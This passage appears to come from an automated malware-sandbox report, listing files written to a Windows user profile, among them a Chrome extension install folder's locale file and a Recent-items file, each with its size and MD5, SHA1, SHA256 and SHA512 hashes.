SHA25667d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550
SHA5129574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5
-
Filesize
851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir5056_1873122537\CRX_INSTALL\_locales\en_US\messages.json
Filesize1KB
MD564eaeb92cb15bf128429c2354ef22977
SHA145ec549acaa1fda7c664d3906835ced6295ee752
SHA2564f70eca8e28541855a11ec7a4e6b3bc6dd16c672ff9b596ecfb7715bb3b5898c
SHA512f63ee02159812146eee84c4eb2034edfc2858a287119cc34a8b38c309c1b98953e14ca1ca6304d6b32b715754b15ba1b3aa4b46976631b5944d50581b2f49def
-
Filesize
1KB
MD52a738ca67be8dd698c70974c9d4bb21b
SHA145a4086c876d276954ffce187af2ebe3dc667b5f
SHA256b08d566a5705247ddc9abf5e970fc93034970b02cf4cb3d5ccc90e1a1f8c816e
SHA512f72b9190f9f2b1acc52f7fbb920d48797a96e62dfc0659c418edbbc0299dccf1931f6c508b86c940b976016745b9877f88f2ee081d3e3d5dcdcc2cc7e7884492
-
Filesize
4KB
MD5464a2b4d146c111b6f9d38d15973a64a
SHA1efb2905ba6f5ce2f70d016a956e6858a315236df
SHA2567d8d3453dac5f9630b1e11bbf62ffcf8a42e84bf76ba341bb9a3f8951bd0ebdd
SHA5124fdf608b018150abdafe01ed309e134abec621ef2836d07beb57c2304cd37a8bcf58067d34ce3bc37c57040c1aca3db7b2153aaafb33fcbb040637bb8d39306d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD5c3dc2054dfaf7f8ca8c3c0e96629234b
SHA1eb13697a33dccce4e0c5e898342050244046c014
SHA256a52714aceb17e49a53c03afe779bf6f4127fe849456f79f25ffd8feec5aa18c9
SHA512fecbd267a702fd8649a9a517a83934e96b59cd9599a0d0778c09a9d6f9019fb636bed3c12bc604900a9d6f61e4953dba35c1fd77ecbf7b26d987019a14b1ec8d
-
Filesize
575B
MD5c37a9a4dc6e0e3b219be434053d3abd1
SHA18e4fdd14c0106a94092d05f069508b382afecfa6
SHA2564fc98b5fdf8e7d2af8d4dfc3b3c46d3b9aa3bb1e37900e35f85650474fd05fcf
SHA512d0b26556f489907b4d08e5b65c1c7e500d75754ac3930966d2a809026fe790c0f041d964dcc875c3fd7106b42631ccc41cf475bf12b074e185fbe878d9f0fff0
-
Filesize
272B
MD524e556478b4be6cc2eaa57bd6196431a
SHA1c994fbde58fec55546cc836d564399f3521e7e13
SHA2567bde088fe924301788ed8cedcc4719ad0e8fb3c00f7f65211431819296bc2160
SHA5124c338053f62a2a92d2250c2ecc529399c67a9b68653cbef322dcc947b27af6926fa43ddd1fb145a3ec16c86cf1febe393c8ca1c176fdb7d71523c25744fcd4fc